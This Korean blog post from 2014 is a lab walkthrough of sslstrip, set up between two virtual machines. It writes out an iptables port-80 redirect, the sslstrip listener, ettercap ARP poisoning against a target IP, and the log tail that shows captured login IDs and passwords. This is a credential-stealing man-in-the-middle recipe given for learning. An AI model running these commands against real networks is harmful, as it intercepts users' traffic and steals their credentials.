sslstrip

Etc/Backtrack 2014. 10. 26. 13:28


이번시간은 sslstrip란 명령어에 대해서 알아보자..


sslstrip란 말 그대로


ssl 프로토콜로 전달되는 패킷에대해서 스트립트,

즉, ssl패킷을 풀어서 내용을 본다는 얘기다.ㅎ


일단  실험은


가상머신에서 두대의 컴퓨터


공격자 : 172.30.1.5 

타켓    : 172.30.1.10


시작해보도록하자.




이게 현재 공격자의 아이피주소이고,




요게 타켓의 아이피 주소이다.



일단 공격자 컴퓨터에서 명령을 실행한다.





iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [임의의 포트번호]


현재 필자는 포트번호 10000번을 사용하였다.


그런다음 저장을 위해 iptables-save를 입력.!


하면 밑에 Completed라고 제대로 된것을 확인할 수 있다.





sslstrip명령어에 -l옵션을 추가해서 

방금전 지정한 포트번호를 적어준다


그러면 밑에보면 실행되는것을 확인 할 수있다.




새로운 터미널창을 하나 띄어서 

ettercap -T -q -M ARP /대상ip주소/ // output:

이렇게 입력해준다.




또다시 터미널창 하나 더띄우고 

tail -f sslstrip.log 를 입력한후 엔터!


이렇게하면 공격자 입장에서 셋팅이 끈났다.ㅎㅎ


이제 시나리오는 이렇다.


타켓의 컴퓨터가 어떤 사이트에 접속해서 

아이디와 비번을 입력하고 로그인하면

공격자의 화면에 아이디와 비번값이 나타나게 된다.





타켓 컴퓨터에서 특정사이트에 접속해서 

로그인을 하게된다.





이런 화면이 뜨게된다. 

아이디와 비번을 맞게 입력햇는대 페이지를 찾을수없다고뜬다... 음.;


이런과정이 진행될때 

공격자 피시로 다시가보자.





이렇게 공격자의 피시에

해당 웹 주소와 로그인한 id passwd값이 그대로 나오는 것이 확인가능하다.ㅎㅎ

이로써 공격자는 아이디와 비번을 획득 할 수있다.



여기서 sslstrip이 통하는 범위는.

일반 홈페이지가 http로 작동되고

로그인할때 암호화를 걸어두지않는다는 조건하에 통하게된다.


요즘 사이트 대부분이 https:// 로 시작하는 url인데

이런곳에서는 sslstrip이 먹히질않는다.




'Etc > Backtrack' 카테고리의 다른 글

Aircrack  (0) 2014.11.17
fragrouter  (0) 2014.10.14
arp spooping  (0) 2014.10.14
reverseraider  (0) 2014.10.07
lbd  (0) 2014.10.07
,